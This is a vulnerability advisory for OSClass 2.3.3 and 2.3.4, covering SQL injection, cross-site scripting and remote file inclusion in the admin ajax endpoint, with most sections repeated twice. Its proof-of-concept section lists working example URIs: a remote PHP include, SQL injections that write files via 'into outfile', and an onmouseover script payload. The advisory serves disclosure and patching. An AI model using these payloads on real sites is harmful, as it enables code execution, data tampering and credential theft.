OSClass Multiple Remote Vulnerabilities
BID:51721
Info
OSClass Multiple Remote Vulnerabilities
| Bugtraq ID: | 51721 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2012 12:00AM |
| Updated: | Jan 30 2012 12:00AM |
| Credit: | Reported by the vendor |
| Vulnerable: |
OSclass osclass 2.3.4 OSclass osclass 2.3.3 |
| Not Vulnerable: |
OSclass osclass 2.3.5 |
Discussion
OSClass Multiple Remote Vulnerabilities
OSClass is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and a remote file-include vulnerability.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary server-side script code on an affected computer in the context of the webserver process; other attacks are also possible.
OSClass 2.3.4 is vulnerable; other versions may also be affected.
OSClass is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and a remote file-include vulnerability.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary server-side script code on an affected computer in the context of the webserver process; other attacks are also possible.
OSClass 2.3.4 is vulnerable; other versions may also be affected.
Exploit / POC
OSClass Multiple Remote Vulnerabilities
An attacker can exploit these issues through a browser. To exploit cross-site scripting issue, an attacker must entice an unsuspecting victim into following a malicious URI.
The following example URIs are available:
http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php
http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201
http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201
http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E
An attacker can exploit these issues through a browser. To exploit cross-site scripting issue, an attacker must entice an unsuspecting victim into following a malicious URI.
The following example URIs are available:
http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php
http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201
http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201
http://www.example.com/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E
Solution / Fix
OSClass Multiple Remote Vulnerabilities
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
OSClass Multiple Remote Vulnerabilities
References:
References:
- OSClass 2.3.5 (OSclass)
- osclass Homepage (OSclass)